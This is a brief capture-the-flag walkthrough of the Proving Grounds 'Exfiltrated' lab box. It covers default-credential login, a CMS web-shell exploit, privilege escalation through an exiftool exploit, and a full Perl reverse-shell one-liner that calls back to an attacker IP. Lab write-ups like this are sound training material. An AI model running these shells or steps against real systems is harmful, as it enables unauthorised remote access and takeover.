Proving Grounds Practice —Exfiltrated
Hello, today I’ll talk about the solution of Proving grounds Practice — Exfiltrated.
First, we run an Nmap scan.
I tried the directories returned in the nmap output for the website over 80. I was able to log in when I typed admin:admin by default in the login field on the /panel page.
At the same time, I researched whether there was a specific exploit for CMS.
When I tried the resulting exploit, we got a web shell.
We created and ran the following code with Reverse Shell Generator.
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.233:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
To get a shell on our own machine, we ran the following command in the web shell and listened to the 4444 port we set.
Then we upgraded the shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
Let’s see what we can do to increase our authority by installing linpeas.sh.
In the linpeas output I saw that image-exif.sh was running constantly.
When we examine the code, we see that it uses exiftool.
I decided to do exploit research for exiftool, and decided to try the first exploit that came out.
After copying the file to my own directory, I tried to run it and we can get a reverse shell with the -s flag.
After creating our image.jpg file, we transfer the file through a Python server.
While creating the image file, we set it to listen on port 4545. When we listened to this port, we got the shell with root privilege.
Yes, we now have root. We can get our proof.txt file.
We find our flag and complete the challenge. Keep hacking !
Practice makes perfect :)
